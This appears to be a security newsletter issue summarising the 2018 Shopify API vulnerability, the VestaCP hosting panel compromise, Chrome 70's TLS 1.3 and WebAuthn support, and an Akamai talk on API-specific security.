Vulnerabilities

The Shopify vulnerability happened (and was fixed) back in May 2018. This week, Arif Khan goes into the details of the vulnerability and the lessons that we can learn from it for microservices and API security in general. In a nutshell, microservices themselves and the underlying cloud platform expand the attack surface. It is no longer just the perimeter so you need API security, ideally on the microservice level, and to lock down the APIs and methods and data to the bare minimum that you really need.

VestaCP, a popular open-source web hosting control panel, was hacked and used to launch DDoS attacks. Most likely the software was hacked because its installation script contained Base64-encoded (and thus unencrypted) admin credentials and server URL.

Standards

Chrome 70 released this week includes the final version of the TLS 1.3 standard and the updated Web Authentication API that gives authentication with the TouchID on macOS and the fingerprint sensor on Android.

Technology deep dive

Opinions

Fernando Serto from Akamaitalks about (among many other fascinating things like protection against bots and distributed password hacking) how the transition from websites to mobile apps makes APIs the primary means of access, so the traditional web app security no longer helps. Instead, we need API-specific authentication, authorization, and analytics.